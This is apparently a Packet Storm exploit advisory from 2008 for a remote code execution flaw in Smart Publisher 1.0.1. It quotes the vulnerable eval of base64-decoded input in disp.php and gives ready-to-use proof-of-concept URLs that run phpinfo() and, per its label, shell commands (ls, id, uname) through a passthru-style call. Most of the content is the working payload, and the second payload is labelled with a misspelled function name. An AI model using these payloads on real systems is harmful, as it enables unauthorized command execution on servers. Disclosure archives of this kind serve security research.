smartpub-exec.txt

2008-01-30T00:00:00
ID PACKETSTORM:63086
Type packetstorm
Reporter GolD_M
Modified 2008-01-30T00:00:00

Description

                                        
                                            ` ###### ###### ############## ###### ###### ######## ##   
#### ## ## ## ## ## ## ## ##   
######## ## ## ## ######## ## #### ###### ## ## ######## ## ######   
## ## ## ## ## ## ## ## #### ## ## ## ## ## ##   
########## ## ## ## ########## ## ## ## ########## ## ###### ##   
## ## ## ## ## ## ## ## ## ## ## ## ## ## ##   
## ## ## #### ## ## ### ## ## ## ## ## ## ## ##   
######### ###### #### ######### ### ###### ########## ###### ########## ###### ##########  
  
######################################################################  
### Smart Publisher 1.0.1 (disp.php) Remote Code Execution Exploit ###  
### Script : http://sourceforge.net/projects/smart-publisher/ ###  
### Vuln Code In '/admin/op/disp.php'In Line '3' ###  
### eval("\$v=".base64_decode($filedata).";"); <- Vuln ###  
### POC : ###  
### /admin/op/disp.php?filedata=cGhwaW5mbygp <= phpinfo() Base64 ###  
### ?filedata=cGFzc3RoZXUobHMgLWxpYTtpZDt1bmFtZSAtYSk <= passtheu(ls -lia;id;uname -a)  
######################################################################  
  
`